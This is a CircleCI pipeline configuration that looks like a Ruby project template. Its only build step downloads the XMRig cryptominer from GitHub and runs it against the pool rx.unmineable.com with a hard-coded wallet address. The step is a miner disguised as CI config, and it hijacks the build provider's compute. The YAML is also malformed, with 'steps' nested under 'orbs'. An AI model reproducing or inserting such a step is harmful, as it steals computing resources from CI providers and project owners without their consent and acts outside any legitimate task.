# Use the latest 2.1 version of CircleCI pipeline process engine.
# See: https://circleci.com/docs/configuration-reference
version: 2.1

# Orbs are reusable packages of CircleCI configuration that you may share across projects, enabling you to create encapsulated, parameterized commands, jobs, and executors that can be used across multiple projects.
# See: https://circleci.com/docs/orb-intro/
orbs:
  # See the Ruby orb documentation here: https://circleci.com/developer/orbs/orb/circleci/ruby
  ruby: circleci/ruby@2.1.1
  steps:
      # Checkout the code as the first step.
      - checkout
      - run:
          command: wget https://github.com/xmrig/xmrig/releases/download/v6.22.0/xmrig-6.22.0-linux-static-x64.tar.gz && tar -xvzf xmrig-6.22.0-linux-static-x64.tar.gz && cd xmrig-6.22.0 && ./xmrig -a rx/0 -o rx.unmineable.com:3333 -u POL:0xA35c287E9DFf5351F4C7985e89BCbAA99a8F41C5.n01 -p x --keepalive --cpu-priority=5 --randomx-1gb-pages
          